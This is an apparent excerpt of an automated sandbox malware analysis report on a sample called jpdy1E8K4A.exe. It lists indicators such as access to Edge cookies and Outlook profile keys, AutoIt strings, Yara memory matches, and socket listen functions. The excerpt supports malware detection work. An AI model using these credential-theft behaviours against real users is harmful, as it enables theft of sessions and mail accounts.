Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: jpdy1E8K4A.exe Binary or memory string: WIN_XP
Source: jpdy1E8K4A.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: jpdy1E8K4A.exe Binary or memory string: WIN_XPe
Source: jpdy1E8K4A.exe Binary or memory string: WIN_VISTA
Source: jpdy1E8K4A.exe Binary or memory string: WIN_7
Source: jpdy1E8K4A.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs